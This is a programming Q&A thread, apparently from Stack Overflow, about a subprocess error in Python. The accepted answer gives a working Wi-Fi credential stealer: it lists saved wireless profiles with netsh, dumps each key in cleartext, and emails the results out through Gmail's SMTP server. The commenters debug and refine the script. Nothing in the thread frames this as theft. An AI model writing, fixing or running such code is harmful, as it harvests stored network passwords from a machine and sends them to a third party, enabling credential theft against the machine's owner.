# CalledProcessError for Subprocess.check_output for wlan in windows

Tags: python, subprocess

I'm facing an error called CalledProcessError in Subprocess.Check_output module. Can anyone fix this?

Comment: Please post the code that is being executed and the process you are intending to run

Answer (score 0, accepted):

you program is  returning a non zero status which means that an error occurred during the processing of the command. You probably want to add some argument to your subprocess.check_output command to fix that.

So i made some changes and i m still trying to get the Email pass Send main working. can you check if it works for you ?

```
import subprocess, smtplib, re
import sys


def send_mail(email, password, message):
    server = smtplib.SMTP("smtp.gmail.com", 587)
    server.starttls()
    server.login(email, password)
    server.sendmail(email, email, message)
    server.quit()


command = "netsh wlan show profile"
networks = subprocess.check_output(command, shell=True ,stderr=subprocess.STDOUT)
network_names_list = re.findall("(?:Profile\s*:\s)(.*)", networks.decode("latin-1"))


result = ""

for network_name in network_names_list:
    try:
        print(network_name)
        command = "netsh wlan show profile key=clear" + "".join(network_name)
        current_result = str(subprocess.check_output(command, shell=True))
        result = result + current_result
        send_mail("email", "pass", result)
    except subprocess.CalledProcessError as e:
        raise RuntimeError("command '{}' returns with error (code {}):{}".format(e.cmd,e.returncode,e.output))
```

[subprocess-check-output-returned-non-zero-exit-status](https://stackoverflow.com/questions/27920837/subprocess-check-output-returned-non-zero-exit-status-1)

Comment: command = "netsh wlan show profile" + "".join(network_name) + "key = clear"
 current_result = subprocess.check_output(command, shell = True)

Can u pls modify this? network_name contains saved networks on pc.

Comment: Can you post the code that you are trying to execute and also more details about the environment you are working in ?

Comment: paste.ofcode.org/34Wa333bbFQmMNFezg3vCTm

    Here is the code bro. Please go through this code pasting service. I tried too many times but cannot paste code in stackoverflow.

Comment: see my edit in post above and check if it works for you